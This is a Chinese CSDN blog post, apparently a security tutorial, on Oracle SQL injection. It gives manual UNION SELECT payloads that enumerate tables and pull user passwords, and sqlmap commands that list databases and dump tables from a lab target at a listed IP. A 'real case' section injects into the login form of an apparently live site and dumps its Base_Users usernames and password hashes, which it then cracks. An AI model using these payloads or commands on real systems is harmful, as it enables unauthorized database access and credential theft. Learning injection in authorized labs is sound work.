SQL注入-Oracle手工+sqlmap

已于 2023-06-29 19:35:08 修改
阅读量1.1k 收藏 3
点赞数
分类专栏: SQL注入漏洞合集 文章标签: web安全 oracle sql 数据库
于 2023-06-28 07:53:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51345235/article/details/131428862
版权

 Oracle数据库注入

 

判断列数和显错位

union select '1','2' from dual

 

 

 

暴库名

union select '1',(select table_name from user_tables where rownum=1) from dual

 

 

 

模糊查询表名

查询表名一般查询admin或者user表

union select '1',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual

查询列名

union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users') from dual

 

查询列数据

union select user_name,user_pwd from "sns_users"

 

SQLMAP使用

1、判断数据库注入点

2、判断注入点权限

sqlmap 数据库注入数据猜解

sqlmap 高权限注入读写执行

sqlmao 高权限注入联动MSF

案列演示:mozhe中db2数据库注入

 

使用python运行sqlmap.py      -u:指定测试url

python sqlmap.py -u "http://124.70.71.251:44122/new_list.php?id=1"

意思:判断是否有注入点和目标数据库是什么类型

成功判断出数据库类型

判断数据库权限

--is-dba      #是否是数据库管理员

--privileges     #查看用户权限(--privileges -U root) 

 

 

查询所有数据库

--dbs            #列出所有数据库 

 

查询当前数据库

--current-db     #获取当前数据库名称

python sqlmap.py -u "http://124.70.71.251:44122/new_list.php?id=1" --current-db

 

查询表

--tables -D ""   #列出指定数据库中的表 

--tables            #列出所有数据库中的表 

python sqlmap.py -u "http://124.70.71.251:44122/new_list.php?id=1" --tables -D "DB2INST1"

 

 

查询字段/列名

--columns -T "user" -D "mysql"      #列出mysql数据库中的user表的所有字段 

 

 

查询字段/列名内容

--dump -T "" -D "" -C ""   #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列) 

python sqlmap.py -u "http://124.70.71.251:44122/new_list.php?id=1" --dump -T "NOTICE" -D "DB2INST1" -C "CONTENT"

 

 

如果要继续测试第二个目标,可以清楚缓存在继续

--purge        #清除缓存

 

 

 

真实案例:登陆框注入

抓取登录数据包,判断出存在注入

将HTTP保存

POST /Login/ValidateLogin HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: http://137.220.134.102:8089/Login/index

Content-Length: 31

Cookie: Hm_lvt_8ee3ec23e73c6dcda2c7c9c489c151aa=1647680481; Hm_lpvt_8ee3ec23e73c6dcda2c7c9c489c151aa=1647680481

DNT: 1

Connection: close

userName=admin*&password=123456

数据包中*号表示在此处为注入点

使用sqlmap扫描

sqlmap -r 1.txt

sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字

接着跑出数据表

sqlmap -r 1.txt -D “RYPlatformManagerDB" -tables

接着跑出列

sqlmap -r 1.txt -D “RYPlatformManagerDB" -T "Base_Users" --columns

然后跑出数据,利用sqlmap自带的md5成功破解出密码

sqlmap -r 1.txt -D “RYPlatformManagerDB" -T "Base_Users" -C “Username,password” --dump

 

 

 

 

 

 

xiaoheizi安全
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
利用SQLmap实现 SQL 注入
m0_71805735的博客
06-21 2313
利用SQLmap实现 SQL 注入
SQL注入--Oracle
pygain的博客
10-09 1501
1.判断是否为oracle数据库 id=88 and exists(select *from dual) id=88 and exists(select *from user_tables)这两个表都是系统表,返回正常则为oralce数据库 2.查询字段数 order by 4 异常 order by 3 正常   最大列数为3 3.判断字段类型 id=88 unio
Oracle数据库SQL注入攻击的检测与防御
03-01
论文介绍了SQL注人攻击及其常用的攻击技术,给出了在Oracle数据库中对SQL注人攻击的检测方法与 防御措施,文中的检测方法和预防措施可以应用到任意的数据库系统中。
SqlMap——Oracle注入教程
W小哥
12-01 3820
一、漏洞复现 靶场注入点: http://59.63.200.79:8808/?id=1 1、使用sqlmap检测是否存在注入点 python sqlmap.py -u "http://59.63.200.79:8808/?id=1" --random-agent 检测发现存在注入点,注入点在参数id的位置,数据库Oracle数据库 2、查看Oracle中全部的数据库 python sqlmap.py -u "http://59.63.200.79:8808/?id=1" --random-agen
2024年鸿蒙最新干货 Oracle注入和漏洞利用姿势总结(1),2024年最新移动端h5页面适配
最新发布
2401_84851126的博客
05-15 293
用户权限是执行特定类型的 SQL 语句或访问其他用户对象的权利,Oracle 中的权限可以分为系统权限和对象权限。前者是系统规定用户使用数据库的权限,后者是用户对其自己的表或视图的存取修改权限。Oracle 有超过 100 种不同的系统权限,只有实例管理员或具有 ADMIN 特权的用户才能授予或撤销系统特权,关于每种系统权限的细节,请读者自行查阅其官方文档:System privileges角色相当于一个用户组,其将多个权限和角色组合在一起,以便可以同时向用户授予和撤销它们。
Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))
T1ngSh0w的博客
09-08 1547
Oracle数据库注入-墨者学院-SQL手工注入漏洞测试(Oracle数据库)详细讲解
网络安全进阶学习第十五课——Oracle SQL注入
p36273的博客
08-08 1670
Oracle数据库系统是世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高吞吐量的数据库方案。Oracle服务默认端口:1521Oracle和MySQL数据库语法大致相同,结构不太相同。最大的一个特点就是oracle可以调用Java代码。Oracle要求select … from 后必须要有查询的表名。
Oracle数据库注入
weixin_50464560的博客
08-06 1535
0x01 前言 在渗透测试过程中,总是遇到不熟悉的数据库,知道了有SQL注入漏洞但是无法利用,这总让我很苦恼。因为网上的文章很多都是基于Mysql数据库的,当遇到Oracle数据库时有些数据库层面的不同点对于我们测试总会有点困扰,无法成功利用。故学习了Oracle数据库注入的相关知识,在此总结分享给大家,希望能够对安全从业人员有所帮助。 全文基于对于SQL注入具有一定理解,并且能够在Mysql数据库进行注入的基础上进行阐述。本文旨在讲述Oracle数据库多种情况下如何进行注...
sqlmap 注入oracle,使用 sqlmap 进行 SQL 注入检测
weixin_34915171的博客
04-13 1632
为什么80%的码农都做不了架构师?>>> 最近在看《白帽子讲 Web 安全》,讲服务器端注入攻击时提到一个神器 sqlmap。到 Github:sqlmap 下载工具,到目录下运行python sqlmap.py -u "https://my.oschina.net/lvyi/blog?catalog=423226&temp=1476090615355"即可开始分析有没有...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入的盲注类型,并...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
SQL注入+sqlmap使用
07-04
SQL注入+sqlmap使用SQL注入+sqlmap使用SQL注入+sqlmap使用
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
oracle手动注入
kfjrlgagkogkhpa的博客
03-23 2145
1、首先判断是否存在注入点 and 1=1/and 1=2 2、然后在判断是什么类型数据库and (select count () from dual)>0** Ps:Dual为oracle的一个默认表 eg:http://xxx.xx.xx.xx:xxxx/new_list.php?id=1 and (select count () from dual)>0,正常则表示为Oracle数据库 3、判断列数order by 看页面是否正常显示 4、联合注入, union select null,n
Oracle SQL 注入
prahs的专栏
07-14 8848
Oracle SQL 注入本文主要总结在Oracle注入中的步骤方法和注意事项: 参考了:http://www.freebuf.com/articles/web/5411.html 注入常用语句 常用步骤 注意事项 常用步骤1 找注入点 用单引号’之类的触发报错 用or 1=1, or 1=2之类的观察反馈 2 判断数据库类型 oracle 支持– 类型注释,但是不支持;分隔执行多语句,orac
SQL注入oracle注入+SQLbypass+sqlmap实战
2301_80661529的博客
02-21 1124
Oracle数据库是全球最知名的关系型数据库管理系统(RDBMS)之一,由美国甲骨文公司(Oracle Corporation)开发并维护。作为企业级数据管理解决方案的市场领导者,Oracle数据库在可靠性、安全性、可伸缩性和性能方面具有卓越表现,被广泛应用于各类关键业务场景,包括金融、电信、政府和大型企业的各种复杂应用。**核心特性:**
SQL注入(Oracle显错注入)---zkaq
weixin_38237216的博客
04-11 1136
1.概念 1.oracle数据库特点:很死板 ,非常讲究语法格式 2.dual:dual是一个实表(也有人说它是虚表),如果你直接查询它,它只显示一个X,列名为DUMMY,dual表实际作用只是为了满足oracle数据库的语法格式 3.特点:没有database()函数,没有limit用法。 4.常用的语句 select * from all_tables 查询出所有的表 select * from user_tables 查询出当前用户的表 select*from all_tab_columns 查询出
什么是SQL注入漏洞-SQLmap注入
05-21
SQL注入漏洞是一种常见的Web应用程序安全漏洞,攻击者通过在输入数据中插入恶意的SQL代码,使应用程序接受并执行其代码,从而获得不应该被揭示的敏感信息。SQLmap是一种流行的自动化工具,用于检测和利用Web应用程序中的SQL注入漏洞。它通过发送各种恶意有效载荷来测试目标网站是否存在SQL注入漏洞,并自动获取目标数据库的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值